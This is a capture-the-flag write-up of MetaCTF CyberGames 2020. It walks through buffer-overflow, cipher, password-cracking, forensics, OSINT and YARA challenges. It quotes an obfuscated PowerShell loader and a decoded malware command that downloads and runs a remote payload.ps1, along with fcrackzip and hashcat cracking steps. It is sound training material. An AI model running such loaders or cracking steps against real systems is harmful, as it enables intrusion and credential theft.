MetaCTF logo in front of a computer screen
MetaCTF logo in front of a computer screen
MetaCTF held its annual CyberGames competition on the weekend of October 24th.

MetaCTF CyberGames 2020 Writeup — Last Minute Team Name

This post is a collaborative effort between myself, Connor C., Tim E., and Tilden W. Together, we represented Northeastern University, the University of Cincinnati, the Rochester Institute of Technology, and the University of Virginia. Thanks for a great time, guys!

MetaCTF is an annual cybersecurity Capture The Flag (CTF) event, hosted online this year due to the COVID-19 pandemic. Teams of four from across the world, composed of students and non-students alike, competed in the event for a total prize pool of $5000. The 24-hour event began on October 24 at noon EST. In total, 1,587 teams registered for the event, and 995 teams were able to score points.

Our team was Last Minute Team Name, affiliated with the fictitious Zoom University. By the end of the challenge, we were able to earn a total of 6,750 points. Our score placed us in 36th overall, 24th among the student teams, and in the top 4% of scored teams.

Challenges and Kickoff

This year's challenges included binary exploitation, cryptography, forensics, reconnaissance, reverse engineering, multimedia, and web exploitation. We were required to perform and apply various techniques to find buffer overflows, discover data exfiltration in network traffic, gather open-source intelligence (OSINT), brute-force passwords, analyze and detect malware, and reverse engineer audio files. There were also various trivia competitions and bonus flags release throughout the day.

This report covers the challenges we were able to submit before the competition closed. We listed the challenges per section in the order of the points they were worth. The more points awarded for a challenge, the more difficult it was to solve.

The MetaCTF Cyber Games 2020 Kickoff on October 24th

Our Strategy

Due to its remote nature, my team used a Discord server to communicate during the competition. We used one channel per challenge and organized them per category, from lowest to highest point values. We also used emojis to indicate whether we solved a challenge (✅), had attempted it but not for more than an hour (❔), or had tried it for more than an hour without any progress (❓).

Discord channels showing green checkboxes, a white question mark, or a red question mark
Discord channels showing green checkboxes, a white question mark, or a red question mark
The forensics challenges that I worked on during the competition showing our challenge notation

In each channel, we posted the progress we had made and any details we had discovered. Doing so allowed us to rotate between challenges and quickly pick up where another team member had left off without frequently questioning them. If there was a problem that we could not solve for more than an hour, we marked it and moved on, allowing another team member to attempt it later. Some of the most difficult challenges required input from all four of us before solving the challenge.

Binary Exploitation

The addresses and ports in this section are in Netcat syntax. Use the nc command to connect to each challenge.

Baffling Buffer 0

150 points/solved by 580 teams

While hunting for vulnerabilities in client infrastructure, you discover a strange service located at host1.metaproblems.com 5150. You’ve uncovered the binary and source code of the remote service, which looks somewhat unfinished. The code is written in a very exploitable manner. Can you find out how to make the program give you the flag?

The provided code is written in C.

#include <stdio.h>
#include <stdlib.h>

void vuln() {
int isAuthenticated = 0;
char buf[48];
puts("Enter the access code: ");
gets(buf);
puts("TODO: Implement access code checking.");
if(isAuthenticated) {
system("/bin/cat flag.txt");
}
else {
puts("Invalid auth!");
}
}

int main() {
setbuf(stdout, 0);
setbuf(stdin, 0);
setbuf(stderr, 0);
vuln();
return 0;
}

Notably, it uses the unsafe function gets() with a fixed buffer length of 48 bytes. We should perform a simple buffer overflow by inputting too many characters.

A terminal accessing the challenge and inputting too many characters
A terminal accessing the challenge and inputting too many characters
Inserting “aaaaaa…” into the buffer

The flag is MetaCTF{just_a_little_auth_bypass}.

Cryptography

Crypto Stands For Cryptography

100 points/solved by 932 teams

Welcome to the crypto team! We help consult in a variety of areas around the security department, helping to make sure our company is using proper encryption, data storage, and data transfer mechanisms.

The data security team said they currently use something called Base64 to “encrypt” data. They want to know if that’s a secure way to store sensitive data, and provided a sample of data:

TWV0YUNURntiYXNlNjRfZW5jMGRpbmdfaXNfbjB0X3RoZV9zYW1lX2FzX2VuY3J5cHRpMG4hfQ==

Is it secure? Can you crack it?

CyberChef can be used to convert the Base64 to plaintext:

Image for post
Image for post
CyberChef with a Base64 recipe

The flag is MetaCTF{base64_enc0ding_is_n0t_the_same_as_encrypti0n!}.

ROT 26

150 points/solved by 707 teams

We’ve applied some encoding to obfuscate our messages. There’s no way you can figure out the original message now?! I applied the unbreakable ROT 26 algorithm:

g!0{]n`7*+0y~+1|(!y.+0yKM9

Dcode is a great website to crack many different types of codes. Here, it was used to brute-force the “ROT 26” ciphertext.

Screenshot showing the ciphertext input to the Dcode website
Screenshot showing the ciphertext input to the Dcode website
Using Dcode with the full ASCII table to see different shifts
Screenshot showing the flag
Screenshot showing the flag
The shift for ASCII[!-~]+26

The flag is MetaCTF{not_double_rot_13}.

Welcome to the Obfuscation Games!

175 points/solved by 600 teams

During a recent incident response investigation, we came across this suspicious command executed by an attacker, and we’d like you to analyze it. Malware authors like to obfuscate their payloads to make it harder, but we’re sure you’re up to the task. See if you can figure out what’s happening without even running it!

$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(“H4sIAEFgjl8A/xXMMQrCQBCF4as8FltPIFaCnV3A8jFmn8ngupuYaUS8e5LyL77//vHQcWxLIHWj8Cw2wBd4RWyp2resjMm+pVlOJxzmGWekm8Iu3fU3ScXrwIf1L26C+4CtijukBY3hb/3TCj2Ieh9qAAAA”));IEX (New-Object IO.StreamReader(New-ObjectIO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();

We know that the GzipStream function is used to compress and decompress data in the GZip format. For this challenge, we can use a simple online tool to convert the Base64 string in the function to a .gz file.

Download and unzip the .gz file with any compatible extraction software, and inside is a text file which contains the flag MetaCTF{peeling_back_the_flag_one_code_at_a_time} .

The Last Great ZIP File

200 points/solved by 472 teams

Help! I’ve created a zip archive that contains my favorite flag, but I forgot the password to it. Can you help me recover my flag back?

You may need to use another program, such as wget to download the file if your browser is blocking the download. Now to get the password hash from the zip file…

Use fcrackzip and the rockyou.txt file (included on Kali) to crack the password of this .zip file.

sudo apt-get install fcrackzip
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt flag.zip
A screenshot of a terminal running fcrackzip
A screenshot of a terminal running fcrackzip
The fcrackzip command with a rockyou.txt dictionary and the flag.zip file

Now use the password to get the flag:

A screenshot of a terminal running the unzip command
A screenshot of a terminal running the unzip command
Extracting the flag from the .zip file once the password is known

An image file is extracted:

Bad handwriting of the flag
Bad handwriting of the flag
Somebody likes MS Paint.

The flag is MetaCTF{crack_the_planet}.

Board Meeting Gone Wrong

325 points/solved by 70 teams

I stole this sensitive document that contains some really important board notes. I have a feeling I can get some serious insight on stonks here.

There are a few things I know about the person I stole it from. He likes animals, he likes to speak like he’s a hacker to make himself seem cool, and he was born in 1972. I hope that helps.

Can you help me crack it? I will make sure to share some of the profits.

First, get the hash of the document using Office2John:

python office2john.py Board_Meeting_Notes.docx

Now, create the wordlist to use with Hashcat. Based on the hint, we believe that the password:

  • Contains an animal name in in leet
  • Contains the contiguous string “1972”, probably at the start or end
  • May have the first letter capitalized

We found a large list of animal names on GitHub (animals.txt) and translated them into leet with WordListGen, creating an animals-leet.txt file.

A terminal showing the wordlistgen.py command
A terminal showing the wordlistgen.py command
The WordListGen.py command converting a text file into leet

Then we copied and prepended 1972 to the start of each word in animals-1337.txt, creating animals-1337-start.txt, and appended 1972 to another copy of the file, creating animals-1337-end.txt. We also created a version of each file in which each line started with a lowercase letter (the animal list from GitHub used uppercase animal names). All of these actions can be done with the Linux built-in awk or sed commands.

Merging the files gives us the dictionary to use for cracking the password:

!!@m@1972
!08$+3r1972
!0ng-3@r3d 0w!1972
!1++!3 P3ngu1n1972
!10n1972
!10nf1$h1972
!12@rd1972
!1g3r1972
!30p@rd1972

Using our dictionary with Hashcat gives us the password: d0lph1n1972

A screenshot of a terminal with the Hashcat command and statistics
A screenshot of a terminal with the Hashcat command and statistics
Running Hashcat with the hash obtained from Office2John

Opening the file gives the flag: MetaCTF{not_all_meetings_are_secret} .

A file containing some irrelevant text and the flag
A file containing some irrelevant text and the flag
The Board_Meeting_Notes.docx file

Forensics

I did most of these forensics challenges on SIFT Workstation.

Forensics 101

100 points/solved by 839 teams

Sometimes in forensics we run into files that have odd or unknown file extensions.

In these cases it’s helpful to look at some of the file format signatures to figure out what they are. We use something called “magic bytes” which are the first few bytes of a file.

What is the ASCII representation of the magic bytes for a RAR archive?

“Magic bytes” is another term for a file signature, the sequence of bytes at the beginning of a file that is used by an operating system to determine the appropriate application to open it. File signatures are primarily used in Linux since Windows prefers to use the file extension, a three-character string affixed to the end of a filename. However, some Windows programs and web applications may also use the file signature.

File signatures are generally seen as the more secure method for determining the applications that can open a file because they are less easily editable than extensions. They are also useful for steganography and file carving. If an analyst suspects that a file is hiding inside another, and as long as neither file is encrypted or encoded, many forensics programs can identify the hidden file and extract it based on the occurrence of nonmatching file signatures inside of the host file.

Wikipedia keeps a list of file signatures. According to the list, a RAR archive’s file signature should be Rar!…. This is the flag.

Staging in 1…2…3

150 points/solved by 737 teams

The Incident Response (IR) team identified evidence that a Threat Actor accessed a system that contains sensitive company information. The Chief Information Security Officer (CISO) wants to know if any data was accessed or taken.

There was a suspicious file created during the timeframe of Threat Actor activity:

C:\123.tmp. Can you check it out?

If you were to download the provided file, it would appear like this in Windows:

A Windows unidentified file icon
A Windows unidentified file icon
123.tmp viewed in Windows

Since Windows uses the file extension instead of the signature as previously discussed, the OS believes that this is a Windows temporary file. However, we know better. Open the file on Linux.

A Linux RAR file icon
A Linux RAR file icon
123.tmp viewed in Linux

UNIX-based operating systems will properly read the file type (an archive file) based on the signature. However, let’s run the UNIX file command on it to be sure.

A screenshot of the terminal with the Linux file command identifying a RAR file
A screenshot of the terminal with the Linux file command identifying a RAR file
'file’ command output

More specifically, this is a RAR archive file, the same file format we just analyzed. It can be extracted via the GUI, but I prefer the terminal.

Screenshot of a terminal with the unrar command and the flag
Screenshot of a terminal with the unrar command and the flag
Using `unrar` to extract the file

Now that the correct file type was identified and the contents have been extracted, the flag is clearly visible:

MetaCTF{definitely_n0t_all_0f_y0ur_sensitive_data}

To do this in Windows, change the file extension to .rar. You may need a 3rd party application like 7-Zip or WinRAR to extract it.

Publish3r

225 points/solved by 430 teams

We believe we found a malicious file on someone’s workstation. Judging by looking at it, the file likely came from a phishing email. Anyways, we’d like you to analyze the sample, so we can see what would have happened if it executed successfully. That way we can hunt for signs of it across the enterprise. Your flag will be the URL that the malware is trying to reach out to! Can you do it? Format: MetaCTF{http://.........}

Note: We’ve put the actual file in an encrypted 7z so your browser doesn’t complain when downloading it (and our site doesn’t get flagged as malware). The password is

metactf

Once again, the file is compressed, this time with 7-Zip. Extract it.

7z x Publish3r.7z

This time, the file extension does match the magic bytes. It is a Microsoft Publisher document.

A screenshot of the terminal with the Linux file command identifying a Publisher document
A screenshot of the terminal with the Linux file command identifying a Publisher document
'file’ command output

As this is an easier forensics challenge, starting with basic static analysis would make sense. Try running strings on the file.

strings Publish3r.7z > strings.txt

Open the strings.txt file to look for any suspicious data. Among the many strange things in this Publisher document, it most certainly should not be invoking Windows PowerShell. This PowerShell command is encoded, though… I’ll use CyberChef’s Magic function to figure out what it is.

Screenshot of the CyberChef application showing a result snippet with properties Base64 — Valid UTF8 output and entropy 4.09
Screenshot of the CyberChef application showing a result snippet with properties Base64 — Valid UTF8 output and entropy 4.09
CyberChef Magic results for the encoded string

Ah! Base64. Now use CyberChef’s Base64 decoder.

Screenshot of the CyberChef application with a URL output
Screenshot of the CyberChef application with a URL output
CyberChef Base64 Decode results for the encoded string

The decoded command is:

IEx ((nEW-OBJeCt net.webclient).downloadstring(("http://13.37.10.10:4443/doc/payload.ps1")))

Therefore, the flag is MetaCTF{http://13.37.10.10:4443/doc/payload.ps1}.

Open Thermal Exhaust Port

275 points/solved by 416 teams

Our TCP connect Nmap scan found some open ports it seems. We may only have a pcap of the traffic, but I’m sure that won’t be a problem! Can you tell us which ones they are?

The flag will be the sum of the open ports. For example, if ports 25 and 110 were open, the answer would be MetaCTF{135}.

This challenge presents a packet capture (.pcap file) that can be analyzed with Wireshark. There are two IP addresses — 10.0.2.6 and 10.0.2.15. Nmap is a port scanner, so if you know about the TCP Three-Way Handshake, you will know that the client that is sending packets with SYN (synchronize) flags is the one that is scanning with Nmap, and the one frequently sending RST, ACK (reset, acknowledge) flags is the target.

A screenshot of Wireshark with multiple repeating rows of outgoing SYN traffic and returning RST, ACK traffic
A screenshot of Wireshark with multiple repeating rows of outgoing SYN traffic and returning RST, ACK traffic
The packet capture showing port scans from 10.0.2.15 to 10.0.2.6

Based on this information, 10.0.2.15 is clearly the attacker, and 10.0.2.6 is clearly the target. The target will send the RST, ACK flag pattern when the destination port is closed and SYN, ACK when the port is open, which is how Nmap identifies open ports (barring there is no firewall or IPS in the middle of the connection).

Now, we need to look for the ports returning SYN, ACK from the target. By applying a display filter for 10.0.2.6 as a source and packets that have the SYN and ACK bits set in the TCP flags (ip.src == 10.0.2.6 and tcp.flags == 0x12), the results are narrowed down significantly.

A screenshot of Wireshark showing only a few rows of returning SYN, ACK traffic
A screenshot of Wireshark showing only a few rows of returning SYN, ACK traffic
The packet capture with filters applied

The port on the left in the info field is the source port, and the port on the right is the destination field. We are focusing on the source port because the traffic we are interested in originates from the target (set as the display filter). Now, ignoring duplicates, we can add up the seven open port numbers to get the flag.

80 (HTTP) + 443 (HTTPS) + 23 (Telnet) + 21 (FTP) + 53 (DNS) + 22 (SSH) + 3128 (Squid Proxy) = 3770MetaCTF{3770}

I was hoping for 1337, but that might’ve been too obvious of a flag.

Mystery C2

325 points/solved by 157 teams

Our threat intel team detected some malicious Command-and-Control traffic in our network. Can you identify what C2 framework the threat actor is using?

You only have 5 attempts for this one.

This challenge includes another .pcap file. Upload it to PacketTotal to get a high-level picture of what the malware is doing.

A screenshot of the PacketTotal service with the .pcap file analysis displayed
A screenshot of the PacketTotal service with the .pcap file analysis displayed
PacketTotal identifying the target IP 8.8.4.4 and the target port 443

The malware sent many packets from 10.0.2.15 (an RFC 1918 private address) to 8.8.4.4, Google’s alternate DNS server, over port 443 (HTTPS). Are there any C2 servers that use DNS over HTTPS and can use Google’s DNS server?

Yes, there is: a quick search reveals that this C2 is most likely goDoH.

Just in Time

375 points/solved by 20 teams (we were the first team to solve!)

Time is running out, and we need your help! Our team has managed to recover a hard drive from a suspect’s computer, and we think there may be information pertaining to the location of an upcoming meet. Unfortunately, the user almost certainly uses an encrypted messaging program when communicating sensitive info.

We’re hoping to recover the address of the meet, which is the flag. Please enter just the street number and road, for example,

123 Easy Street. Also, to make the file download more manageable, we’re giving you just the Users folder with some large (and irrelevant files) deleted. You can download the Users folder here.

Even though the message was purportedly encrypted, there is still the possibility that the operating system or program cached it before it was sent. If the cache hasn’t yet been cleared, it should be possible to recover the message if you know where to look. There are a few locations where the message might still be available:

  • The operating system, because it handles all keyboard input
  • The web browser, if the encrypted chat application is web-based
  • A client application for the chat service that was used to send the message

I will use FTK Imager for this challenge because it provides a simple method for organizing system files and applying forensic techniques.

A screenshot of FTK Imager with the Users folder open
A screenshot of FTK Imager with the Users folder open
AppData folder displayed in the evidence tree in FTK Imager

There is only one user present on the system (excluding the default accounts), Xiang Zhi. Starting with the operating system, browse to C:\Users\Xiang Zhi\AppData\Local\Microsoft\InputPersonalization\TextHarvester\. This folder would store TextHarvester.dat, a file that adapts to the user's language model and dictionary if Input Personalization is enabled (and contains sensitive keystrokes on occasion). Unfortunately, the folder is empty, so this feature must not be enabled.

Moving on to the browser, C:\Users\Xiang Zhi\AppData\Local\Google shows that Google Chrome is installed. Let’s use Hindsight to learn about Zhi’s web browsing activities.

A screenshot of Excel with the Hindsight .csv file open
A screenshot of Excel with the Hindsight .csv file open
Hindsight’s .csv file export displaying visited URLs, site preferences, and downloads

They downloaded Wire-Setup.exe, which is the installer for the Wire encrypted messaging app. Unfortunately, there are no credentials, nor is there an address. We will have to inspect the application data itself.

If we continue looking around in the C:\Users\Xiang Zhi\AppData folder, we find a Wire folder under C:\Users\Xiang Zhi\AppData\Roaming. What files or folders have been edited recently?

A screenshot of FTK Imager displaying the evidence tree expanded to the Wire folder
A screenshot of FTK Imager displaying the evidence tree expanded to the Wire folder
The Wire IndexedDB folder

There is a database folder a few layers down that has an edit date of September 13th at around 10:00 PM EST. What’s in there?

A screenshot of FTK Imager displaying the file list with last modified dates
A screenshot of FTK Imager displaying the file list with last modified dates
The log files in the Wire IndexedDB folder

Check out the log file for anything interesting. We find an address by searching the file for the word “meet,” as the challenge suggests.

FTK Imager viewing a log file with the word “meet” highligted and an address visible in the same line
FTK Imager viewing a log file with the word “meet” highligted and an address visible in the same line
Searching for the word “meet” in the log file

Therefore, the flag is MetaCTF{933 English Muffin Way}.

Multimedia

Watermarked

250 points/solved by 146 teams

Sonic watermarks are a security measure used by many different actors in the audio recording industry. Audio engineers sometimes mix them into unfinished tracks in case they are leaked outside of the studio, and developers of VST plugins often manipulate the generated sound to limit those using free trial or cracked versions of their software.

You are an audio engineer working with famous post-lingual rapper Playball Carl, and you’ve been alerted to a leak that just surfaced on SoundCloud. Recover the watermark to find the identity of the leaker.

Studio Version vs. Leaked Version

Actual track ID: wido — 1292Forex

This challenge requires a basic understanding of audio engineering. The player is given two seemingly identical FLAC files — same length and same looking spectrograph, but one of them contains an inaudible watermark. The spectral analysis doesn’t return any useful information, so we should try to determine if the watermark is hidden in the audio somehow.

We know that if you play two identical audio tracks simultaneously with one track inverted, the noise will cancel out. Let’s use this technique to see if we can determine any differences between the tracks. To do this, import both audio tracks into the same project on Audacity, select one of the tracks and apply Effect > Invert to it, and then play:

A screenshot of Audacity with the two audio tracks visualized
A screenshot of Audacity with the two audio tracks visualized
Inverting the audio of the two tracks in Audacity

When we hit play, we don’t hear any music but instead what sounds like a text-to-speech program reading off each character in the flag, which comes out to the following:

MetaCTF{p4r7ing_7h3_w4v3z}

Reconnaissance

Big Breaches

150 points/solved by 718 teams

How many unique emails were exposed in the biggest single collection of breached usernames/passwords? Provide the answer (flag) in the format MetaCTF{###,###}.

The biggest single collection of breached usernames and passwords available online is almost certainly Collection #1 from 2019. From a quick search, it contains 772,904,991 usernames and passwords. The flag is MetaCTF{772,904,991}.

Not So Itsy Bitsy Spider

200 points/solved by 710 teams

Recent reporting indicates that a prominent ransomware operator, known as WIZARD SPIDER, was able to deploy Ryuk ransomware in an environment within 5 hours of compromise.

What recent, critical vulnerability was exploited in this environment to gain elevated privileges?

The flag will be in the following format:

CVE-XXXX-XXXX

Since the challenge asks for a “recent” and “critical” vulnerability that is exploited by Ryuk, try searching online for “Ryuk CVE 2020” and checking if any critical vulnerabilities appear in the results.

A search result “Ryuk in 5 Hours — The DFIR Report”
A search result “Ryuk in 5 Hours — The DFIR Report”
The first result when searching for “Ryuk CVE 2020”

The first result mentions CVE-2020–1472, also known as Zerologon. It is a privilege escalation vulnerability in Windows’ Netlogon service. Does NIST (the maintainer of the National Vulnerability Database, which assigns CVEs severity scores) rate this CVE as critical?

A screenshot of CVE-2020–1472 from the NIST NVD
A screenshot of CVE-2020–1472 from the NIST NVD
The National Vulnerability Database (NVD) listing for CVE-2020–1472

Yes, they do. The flag is CVE-2020–1472.

Diving into the announcement

225 points/solved by 499 teams

Vulnerabilities are patched in software all the time, and for the most serious ones, researchers work to build proof-of-concept(POC) exploits for them. As defenders, we need to continuously monitor when new public exploits drop, figure out how they work, and ensure we’re protected against them. Recently, Microsoft announced CVE-2020–1472. Your task is to locate a public exploit for it and identify the vulnerable function that the POCs call. The flag will be the function’s name.

A great place to find POCs for various exploits is on GitHub. Start by searching for the CVE there. This repo that contains a POC Python script looks like a good one. Since CVE-2020–1472 is the Netlogon Escalation of Privilege vulnerability, any function calls in the repo should start with nrpc (for Netlogon Remote Protocol). Helpfully, there is a function in the Python script called exploit() that calls NetrServerPasswordSet2(). As it is the only function called in exploit(), this ended up being the flag.

Finding Mr. Casyn

275 points/solved by 307 teams

This is the first of three challenges related to the Casyn persona.

We’re looking for a Mr. Casyn, who has been reported missing. We believe he lives in the Chicagoland area, but don’t think he’s in Illinois proper. We need your help finding him and identifying the right Mr. Casyn will help us begin our search.

The flag for this challenge is the first name of Mr. Casyn. There are three attempts available for this challenge.

Note: Mr. Casyn is a fake persona that we have created to help you practice your OSINT skills.

To begin this challenge, let’s gather what we know about our persona:

  1. Last name: Casyn
  2. Lives in: Chicagoland area
  3. Lives in: not Illinois

First, let’s search for a Mr. Casyn and see what comes up:

Google search results for “mr. casyn”
Google search results for “mr. casyn”
Lots of “Casyn”s available online, I guess…

The top results do not point towards an obvious answer, and with 128,000 results, it would be infeasible to look for him manually. Instead, let’s narrow down our search. We know the general area where he lives: Chicagoland outside of Illinois. According to Wikipedia, the Chicagoland area is comprised of the following cities:

A screenshot of the Wikipedia page for the Chicago metropolitan area
A screenshot of the Wikipedia page for the Chicago metropolitan area
Wikipedia’s list of cities considered part of “Chicagoland”

We see three cities outside of Illinois: Kenosha, Wisconsin, Hammond, Indiana, and Gary, Indiana. Let’s try attaching these cities to Casyn’s name in our search. The results for searching “casyn hammond” are below:

Google search results for “casyn hammond”
Google search results for “casyn hammond”
A relevant link

Sure enough, we found the Facebook profile of a Vedder Casyn, who turned out to be the target. Unfortunately, the Facebook profile was taken down shortly after the challenge started (we’re unsure why), but we were able to use that name to discover his Twitter profile:

A screenshot of Vedder Casyn’s Twitter profile
A screenshot of Vedder Casyn’s Twitter profile
Found you, Vedder Casyn!

Now we have his name and his website: veddercasyn.me.

Complete Transparency

325 points/solved by 206 teams

At ICMP Industries, we recently created a new subdomain off of our company website. Since our new super secret project is still in development, we chose a long subdomain so no one will know to visit it yet. We also went ahead and upgraded the site to use HTTPS to be more secure.

The flag is the name of our secret subdomain. Note there are dashes between words instead of underscores since it’s a domain name.

Let’s try visiting https://icmpindustries.com/.

Screenshot of a 403 Forbidden error
Screenshot of a 403 Forbidden error
A 403 error from Cloudflare

The company may not be hosting anything on the main site. However, they do say they added HTTPS to the subdomain for extra security. This means that a certificate had to be issued to the subdomain. Try using a tool such as Censys to find the certificate.

A screenshot of the Censys website showing the subdoimains of icmpindustries.com
A screenshot of the Censys website showing the subdoimains of icmpindustries.com
Censys, a tool that indexes certificates issued to websites, among other things

The flag is a-transparent-but-not-invisible-flag.icmpindustries.com.

Ring Ring

325 points/solved by 221 teams

This is the second of three challenges related to the Casyn persona.

We want to try and reach out to Mr. Casyn via telephone. Can you figure out his phone number?

Flag format: XXX-XXX-XXXX. Example: 123–456–7890

Here’s the information we currently know about Mr. Casyn:

  1. Full name: Vedder Casyn
  2. Lives in: Hammond, IN
  3. Facebook profile: https://www.facebook.com/vedder.casyn.5
  4. Linkedin profile: https://www.linkedin.com/in/vedder-casyn/
  5. Twitter profile: https://twitter.com/veddercasyn/with_replies
  6. Github profile: https://github.com/veddercasyn/
  7. Website: https://veddercasyn.me/

We’re looking for his phone number, but unfortunately, it doesn’t appear on any of the accounts above. The cached content of his profiles and websites does not reveal anything, either. However, it is possible that Vedder had more information on his website in the past that he decided to remove. In that case, the only place left to look is the version history of the webpage on Github. Going to https://veddercasyn.github.io/index.md and looking at the commit history gives us a list of a few dozen commits — a lot, but nothing that we can’t look through manually. Fortunately, each one is relatively small. Looking at commit 9257913276447d19f8e08d91ebce83743ff11063, we see the following change:

A screenshot of a GitHub commit containing a phone number
A screenshot of a GitHub commit containing a phone number
He removed his phone number from his website but forgot to rewrite his commit history!

And there’s his phone number: 929–249–4018 .

Hangout Spots

525 points/solved by 127 teams

This is the third of three challenges related to the Casyn persona.

There was no reply from Mr. Casyn’s phone. Can you find out where he likes to frequently hang out so we can look for clues of where he’s been recently? Once you find the image, think of how we can use what we know to geolocate the image based on what’s in the picture.

Flag format is street name, city, state abbreviation zip code. Example: 301 Park Ave, New York, NY 10022

Side note: enjoying the OSINT? Check out https://www.tracelabs.org/ for ways that you can put those skills to use!

Now we have his phone number, but we need to find his exact location. The problem asks to find a common hangout spot, but his website only has this:

A screenshot of a restaurant on Vedder Casyn’s website
A screenshot of a restaurant on Vedder Casyn’s website
Unfortunately, it doesn’t look like this is his hangout spot.

He says he doesn’t go here often and the address of this building (discovered through reverse image search) wasn’t the answer. Remembering what we did in the Ring Ring challenge, let’s go back to his GitHub version history and see if we can uncover anything.

A screenshot of a GitHub commit containing an image link
A screenshot of a GitHub commit containing an image link
He forgot to rewrite his commit history again.

At one point, Mr. Casyn revealed his hangout spot. The removed Imgur link above contains the following image:

A photo of a building with sun glare
A photo of a building with sun glare
There is an antenna with two satellites on it in the background. Is this enough to find the location?

Now we must discover the location of this building. Looking at the image's left-hand side, we can faintly see a google watermark, meaning it’s most likely a screenshot from Google Maps’ street view. Unfortunately, this means there’s no EXIF data in the image. Something is visible in the upper left window, but we can’t make out what it is. Instead, we’ll have to use landmarks in the image to discover the location.

Behind the building, we can see a large radio tower with several radome antennas on it. Anyone into amateur radio will know that all structures like this in the United States must be registered with the FCC.

Fortunately, the FCC keeps a public database of all registered antenna structures along with their exact locations.

Let’s try an advanced search and put in Hammond, IN, but only for towers that are constructed:

A screenshot of the FCC antenna search application
A screenshot of the FCC antenna search application
All antenna structures must be registered with the FCC in this database.

We obtained 18 results, a number reasonable enough to look through manually:

A screenshot of the FCC’s antenna structure database with results
A screenshot of the FCC’s antenna structure database with results
The sixth result is interesting…

We can take the coordinates of each site and put them into Google Maps. Now let’s look at the antenna tower registered to the Hammond Police Department, the sixth result in the list, from the coordinates listed. Go into the street view for a better look at the tower.

An antenna structure with two dome satellites affixed halfway up
An antenna structure with two dome satellites affixed halfway up
The satellites’ positions appear to match.

That certainly looks similar to the tower in the image removed from Mr. Casyn’s website. Since we know what the building roof in the original image looks like, let’s look around for it in the satellite view.

Image for post
Image for post
Two nearby buildings have matching roofs.

The Hammond Public Library, across the street from the police station, looks sort of like the one in our original picture: similar roof, similar parking lot, similar trees. Let’s go down to the street view and see if it matches.

Image for post
Image for post
That’s a match!

We have a match! Going into street view on State Street right outside the Hammond Public Library gives us the image that Mr. Casyn previously published on his website. Finally, we know his hangout spot.

The flag is the address of the library: 564 State St, Hammond, IN 46320.

Side note: Yes, I am enjoying the OSINT! In fact, I participated in my first Trace Labs Search Party just last week at conINT!

Reverse Engineering

[REDACTED]

225 points/solved by 509 teams

The CEO of Cyber Corp has strangely disappeared over the weekend. After looking more into his disappearance. Local Police Department thinks he might have gotten caught up into some illicit activities.

The IT Department just conducted a search through his company-provided laptop and found an old memo containing a OneTime Password to log into his e-mail. However it seems as if someone has redacted the code, can you recover it for us?

The given PDF is a scan of a paper document with a censor bar placed on top of the document, probably with some software. This means that the scanned document itself is one whole object in the PDF file and the censor bar is another object. First, let’s see what the PDF file looks like:

A memo with a black redaction bar placed on top of the flag
A memo with a black redaction bar placed on top of the flag
The redacted PDF document

We will use peepdf to analyze the objects in the PDF:

A screenshot of the terminal with peepdf results
A screenshot of the terminal with peepdf results
There is a large jump between the fifth and sixth offsets.

It looks like Object 5 is the largest one, so it’s probably safe to assume that it contains the original scanned document. Let’s extract it into a jpg file using rawstream:

PPDF> rawstream 5 > docoutput.jpg

We can now see the original PDF:

The memo without a black redaction bar placed on top of the flag
The memo without a black redaction bar placed on top of the flag
The flag is clearly visible.

The flag is MetaCTF{politics_are_for_puppets}.

Precision Matching

375 points/solved by 16 teams

YARA describes itself as a pattern matching swiss knife for malware researchers. I like to think of it though as a precision strike weapon (without the explosion part of course) for seeking out malware based on a configurable, very specific set of characteristics. In addition, it’s quite helpful for identifying related samples built by the same malware author. We recently uncovered a malware author using

a) dynamic imports for their calls to CreateRemoteThread, and

b) Visual Studio 2019.

Here’s the one sample we’ve managed to recover so far. We’d like you to visit our YARA Rule Making Studio and craft a rule to match only these characteristics — no false positives!

About Yara

Yara, created by VirusTotal, is a signature-based method for detecting malware (and many other things). Looking at the documentation for writing Yara rules is helpful for this challenge. The challenge creator has helpfully provided us with a website to check our solution.

A screenshot of the Yara Rule Checking application with a blank rule pre-filled
A screenshot of the Yara Rule Checking application with a blank rule pre-filled
The Yara Rule Checker, how nice!

We are given an empty Yara rule to start with:

rule yarp {
condition:
false
}

This doesn’t detect any of the files as infected.

A screenshot of the Yara Rule Checking application with no matches
A screenshot of the Yara Rule Checking application with no matches
Yara matching results for the empty rule

Matching on Strings

The first signature we need to match on for this rule is the dynamic import for calls to CreateRemoteThread. Define a new string variable with the value CreateRemoteThread. When a string is defined, it must be added to the rule's conditional statement, which tells Yara how to use it.

Currently, our rule looks like this:

rule yarp {
strings:
$crt = "CreateRemoteThread"
condition:
false
}

Hmmm… this rule matches all of the samples.

A screenshot of the Yara Rule Checking application matching all files
A screenshot of the Yara Rule Checking application matching all files
Yara rule matching for the string rule

Limiting scope

We can assume by the result that each file the site is matching to the Yara rule imports CreateRemoteThread. However, by examining the provided binary, it looks like the dynamic calls to CreateRemoteThread only appear at the start of the file, up to 0x0002CC50. Yara allows us to only search up to a certain hex value by using the in operator. Set the rule to search from the beginning of the file (0x1) up to 0x0002CC50.

rule yarp {
strings:
$crt = "CreateRemoteThread"
condition:
$crt in (0x1..0x0002CC50)
}

We are getting closer!

A screenshot of the Yara Rule Checking application matching with two false positives
A screenshot of the Yara Rule Checking application matching with two false positives
Yara rule matching for the dynamic calls rule

Avoiding false positives

However, it’s not enough to avoid false positives, so let’s add the second condition: the malware was created using Visual Studio 2019. Since we are analyzing .exe (portable executable (PE) files), we know that each file contains a header with metadata, including information about the tools used to create it. According to Microsoft’s documentation, this field is the minor linker version. Yara can detect this through its PE module’s linker_version object. Since we need to match Visual Studio 2019, set another condition for the pe.linker_version object to be greater than 20 (Visual Studio version numbers are usually the year they were released + 1). The PE Yara module needs to be imported for this to work.

import "pe"rule yarp {
strings:
$crt = "CreateRemoteThread"
condition:
$crt in (0x1..0x0002CC50)
pe.linker_version.minor > 20
}

Does the rule pass?

A screenshot of the Yara Rule Checking application matching correctly
A screenshot of the Yara Rule Checking application matching correctly
Yara rule matching for the linker version rule

Yes! The flag is MetaCTF{wielding_the_mighty_power_of_yara_to_stop_the_hackers}.

Web Exploitation

High Security Fan Page

125 points/solved by 832 teams

